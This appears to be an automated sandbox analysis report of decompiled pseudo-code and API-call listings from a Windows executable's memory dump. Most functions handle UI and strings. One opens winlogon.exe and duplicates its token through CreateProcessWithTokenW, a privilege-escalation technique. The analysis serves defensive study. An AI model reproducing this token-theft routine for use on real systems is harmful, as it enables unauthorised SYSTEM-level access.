                                                                                                                                                                                                                          			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                          				struct HDWP__* _v8;
                                                                                                                                                                                                                          				intOrPtr* _v12;
                                                                                                                                                                                                                          				void _v534;
                                                                                                                                                                                                                          				short _v536;
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                                          				intOrPtr* _t95;
                                                                                                                                                                                                                          				RECT* _t96;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t95 = __ecx;
                                                                                                                                                                                                                          				_v12 = __ecx;
                                                                                                                                                                                                                          				if(_a4 == 0x233) {
                                                                                                                                                                                                                          					_v536 = 0;
                                                                                                                                                                                                                          					memset( &_v534, 0, 0x208);
                                                                                                                                                                                                                          					DragQueryFileW(_a8, 0,  &_v536, 0x104);
                                                                                                                                                                                                                          					DragFinish(_a8);
                                                                                                                                                                                                                          					 *((intOrPtr*)( *_t95 + 4))(0);
                                                                                                                                                                                                                          					E00404923(0x104, _t95 + 0x1680,  &_v536);
                                                                                                                                                                                                                          					 *((intOrPtr*)( *_v12 + 4))(1);
                                                                                                                                                                                                                          					_t95 = _v12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_a4 != 5) {
                                                                                                                                                                                                                          					if(_a4 != 0xf) {
                                                                                                                                                                                                                          						if(_a4 == 0x24) {
                                                                                                                                                                                                                          							_t42 = _a12;
                                                                                                                                                                                                                          							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
                                                                                                                                                                                                                          							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						E00402EC8(_t95 + 0x40);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_v8 = BeginDeferWindowPos(0xd);
                                                                                                                                                                                                                          					_t96 = _t95 + 0x40;
                                                                                                                                                                                                                          					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
                                                                                                                                                                                                                          					EndDeferWindowPos(_v8);
                                                                                                                                                                                                                          					InvalidateRect( *(_t96 + 0x10), _t96, 1);
                                                                                                                                                                                                                          					_t95 = _v12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00402CED(_t95, _a4, _a8, _a12);
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040421E
                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                                                                                                                          • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                                                                                                                            • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 2142561256-3993045852
                                                                                                                                                                                                                          • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                                                                                                                          • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 55%
                                                                                                                                                                                                                          			E00405B81(signed short __ebx) {
                                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t25;
                                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                                          				signed short _t39;
                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                          				int _t61;
                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                          				int _t71;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t39 = __ebx;
                                                                                                                                                                                                                          				if( *0x41c470 == 0) {
                                                                                                                                                                                                                          					E00405ADF();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t40 =  *0x41c468;
                                                                                                                                                                                                                          				_t21 = 0;
                                                                                                                                                                                                                          				if(_t40 <= 0) {
                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                          					_t57 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
                                                                                                                                                                                                                          						_t21 = _t21 + 1;
                                                                                                                                                                                                                          						if(_t21 < _t40) {
                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L6:
                                                                                                                                                                                                                          				if(_t57 != 0) {
                                                                                                                                                                                                                          					L21:
                                                                                                                                                                                                                          					_t22 = _t57;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					if((_t39 & 0x00010000) == 0) {
                                                                                                                                                                                                                          						if( *0x40fb90 == 0) {
                                                                                                                                                                                                                          							_push( *0x41c478 - 1);
                                                                                                                                                                                                                          							_push( *0x41c45c);
                                                                                                                                                                                                                          							_push(_t39);
                                                                                                                                                                                                                          							_t25 = E00405CE7();
                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							wcscpy(0x40fda0, L"strings");
                                                                                                                                                                                                                          							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                                                                                                                                                                          							_t62 = _t62 + 0x10;
                                                                                                                                                                                                                          							if(_t35 == 0) {
                                                                                                                                                                                                                          								L13:
                                                                                                                                                                                                                          								_t25 = GetModuleHandleW(0);
                                                                                                                                                                                                                          								_push( *0x41c478 - 1);
                                                                                                                                                                                                                          								_push( *0x41c45c);
                                                                                                                                                                                                                          								_push(_t39);
                                                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_t61 = wcslen( *0x41c45c);
                                                                                                                                                                                                                          								if(_t61 == 0) {
                                                                                                                                                                                                                          									goto L13;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t25 = GetModuleHandleW(_t57);
                                                                                                                                                                                                                          						_push( *0x41c478 - 1);
                                                                                                                                                                                                                          						_push( *0x41c45c);
                                                                                                                                                                                                                          						_push(_t39 & 0x0000ffff);
                                                                                                                                                                                                                          						L15:
                                                                                                                                                                                                                          						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                                                                                                                                                          						_t71 = _t61;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if(_t71 <= 0) {
                                                                                                                                                                                                                          						L20:
                                                                                                                                                                                                                          						_t22 = 0x40c4e8;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t27 =  *0x41c46c;
                                                                                                                                                                                                                          						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t57 =  *0x41c458 + _t27 * 2;
                                                                                                                                                                                                                          							_t14 = _t61 + 2; // 0x2
                                                                                                                                                                                                                          							memcpy(_t57,  *0x41c45c, _t61 + _t14);
                                                                                                                                                                                                                          							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                                                                                                                                                                          							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                                                                                                                                                                          							 *0x41c468 =  *0x41c468 + 1;
                                                                                                                                                                                                                          							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                                                                                                                                                                          							if(_t57 != 0) {
                                                                                                                                                                                                                          								goto L21;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t22;
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          0x00405bf6
                                                                                                                                                                                                                          0x00405c4b
                                                                                                                                                                                                                          0x00405c4c
                                                                                                                                                                                                                          0x00405c52
                                                                                                                                                                                                                          0x00405c53
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405bf8
                                                                                                                                                                                                                          0x00405c02
                                                                                                                                                                                                                          0x00405c0e
                                                                                                                                                                                                                          0x00405c13
                                                                                                                                                                                                                          0x00405c18
                                                                                                                                                                                                                          0x00405c2c
                                                                                                                                                                                                                          0x00405c2e
                                                                                                                                                                                                                          0x00405c3b
                                                                                                                                                                                                                          0x00405c3c
                                                                                                                                                                                                                          0x00405c42
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405c1a
                                                                                                                                                                                                                          0x00405c25
                                                                                                                                                                                                                          0x00405c2a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405c2a
                                                                                                                                                                                                                          0x00405c18
                                                                                                                                                                                                                          0x00405bbf
                                                                                                                                                                                                                          0x00405bc0
                                                                                                                                                                                                                          0x00405bcd
                                                                                                                                                                                                                          0x00405bce
                                                                                                                                                                                                                          0x00405bd7
                                                                                                                                                                                                                          0x00405c58
                                                                                                                                                                                                                          0x00405c5f
                                                                                                                                                                                                                          0x00405c61
                                                                                                                                                                                                                          0x00405c61
                                                                                                                                                                                                                          0x00405c63
                                                                                                                                                                                                                          0x00405cdb
                                                                                                                                                                                                                          0x00405cdb
                                                                                                                                                                                                                          0x00405c65
                                                                                                                                                                                                                          0x00405c65
                                                                                                                                                                                                                          0x00405c74
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405c84
                                                                                                                                                                                                                          0x00405c8a
                                                                                                                                                                                                                          0x00405c8d
                                                                                                                                                                                                                          0x00405c99
                                                                                                                                                                                                                          0x00405caf
                                                                                                                                                                                                                          0x00405cbd
                                                                                                                                                                                                                          0x00405cc8
                                                                                                                                                                                                                          0x00405cd4
                                                                                                                                                                                                                          0x00405cd9
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405cd9
                                                                                                                                                                                                                          0x00405c74
                                                                                                                                                                                                                          0x00405c63
                                                                                                                                                                                                                          0x00405ce6

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                                                                                                                            • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                          • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                                                                                                                          • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                          				intOrPtr* _t22;
                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                          				intOrPtr* _t39;
                                                                                                                                                                                                                          				intOrPtr* _t40;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                                                                                                                                                                          				_v12 = _t18;
                                                                                                                                                                                                                          				if(_t18 == 0) {
                                                                                                                                                                                                                          					_t37 = GetLastError();
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t39 = _a4 + 0x800;
                                                                                                                                                                                                                          					_a8 = 0;
                                                                                                                                                                                                                          					E0040289F(_t39);
                                                                                                                                                                                                                          					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                                                                                                                                                                          					if(_t22 == 0) {
                                                                                                                                                                                                                          						_t23 = 0;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if(_t23 == 0) {
                                                                                                                                                                                                                          						_t37 = GetLastError();
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_a4 = _a8;
                                                                                                                                                                                                                          						E0040289F(_t39);
                                                                                                                                                                                                                          						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                                                                                                                                                                          						if(_t40 == 0) {
                                                                                                                                                                                                                          							_t28 = 0;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						if(_t28 == 0) {
                                                                                                                                                                                                                          							_t37 = GetLastError();
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							 *_a12 = _v8;
                                                                                                                                                                                                                          							_t37 = 0;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						CloseHandle(_a8);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					CloseHandle(_v12);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t37;
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                                                                                                                            • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                                                                                                                          • String ID: winlogon.exe
                                                                                                                                                                                                                          • API String ID: 1315556178-961692650
                                                                                                                                                                                                                          • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                                                                          • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                          			E00405236(short* __ebx, intOrPtr _a4) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                          				void _v2058;
                                                                                                                                                                                                                          				void _v2060;
                                                                                                                                                                                                                          				int _t35;
                                                                                                                                                                                                                          				int _t41;
                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                                          				signed short* _t50;
                                                                                                                                                                                                                          				void** _t52;
                                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t48 = 0;
                                                                                                                                                                                                                          				_v2060 = 0;
                                                                                                                                                                                                                          				memset( &_v2058, 0, 0x7fe);
                                                                                                                                                                                                                          				_t54 = _t53 + 0xc;
                                                                                                                                                                                                                          				 *__ebx = 0;
                                                                                                                                                                                                                          				_t52 = _a4 + 4;
                                                                                                                                                                                                                          				_v12 = 2;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_push( *_t52);
                                                                                                                                                                                                                          					_t6 = _t52 - 4; // 0xe80040cb
                                                                                                                                                                                                                          					_push( *_t6);
                                                                                                                                                                                                                          					_push(L"%s (%s)");
                                                                                                                                                                                                                          					_push(0x400);
                                                                                                                                                                                                                          					_push( &_v2060);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t35 = wcslen( &_v2060);
                                                                                                                                                                                                                          					_v8 = _t35;
                                                                                                                                                                                                                          					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                                                                                                                                                                          					_t49 = _t48 + _v8 + 1;
                                                                                                                                                                                                                          					_t41 = wcslen( *_t52);
                                                                                                                                                                                                                          					_v8 = _t41;
                                                                                                                                                                                                                          					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                                                                                                                                                          					_t54 = _t54 + 0x34;
                                                                                                                                                                                                                          					_t52 =  &(_t52[2]);
                                                                                                                                                                                                                          					_t23 =  &_v12;
                                                                                                                                                                                                                          					 *_t23 = _v12 - 1;
                                                                                                                                                                                                                          					_t48 = _t49 + _v8 + 1;
                                                                                                                                                                                                                          				} while ( *_t23 != 0);
                                                                                                                                                                                                                          				_t50 = __ebx + _t48 * 2;
                                                                                                                                                                                                                          				 *_t50 =  *_t50 & 0x00000000;
                                                                                                                                                                                                                          				_t50[1] = _t50[1] & 0x00000000;
                                                                                                                                                                                                                          				return __ebx;
                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %s (%s)
                                                                                                                                                                                                                          • API String ID: 3979103747-1363028141
                                                                                                                                                                                                                          • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                                                                          • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                          			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				short _v516;
                                                                                                                                                                                                                          				void _v8710;
                                                                                                                                                                                                                          				short _v8712;
                                                                                                                                                                                                                          				int _t17;
                                                                                                                                                                                                                          				WCHAR* _t26;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x2204, __ecx);
                                                                                                                                                                                                                          				_v8712 = 0;
                                                                                                                                                                                                                          				memset( &_v8710, 0, 0x2000);
                                                                                                                                                                                                                          				_t17 = GetDlgCtrlID(_a4);
                                                                                                                                                                                                                          				_t34 = _t17;
                                                                                                                                                                                                                          				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                                                                                                                                                          				if(_t17 > 0 && _v8712 != 0) {
                                                                                                                                                                                                                          					_v516 = 0;
                                                                                                                                                                                                                          					memset( &_v514, 0, 0x1fe);
                                                                                                                                                                                                                          					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                                                                                                                                          					_t26 =  &_v516;
                                                                                                                                                                                                                          					_push(L"sysdatetimepick32");
                                                                                                                                                                                                                          					_push(_t26);
                                                                                                                                                                                                                          					L0040B278();
                                                                                                                                                                                                                          					if(_t26 != 0) {
                                                                                                                                                                                                                          						E00406025(_t34,  &_v8712);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                          • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                                                                                                                          • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                                                                                                                          Uniqueness

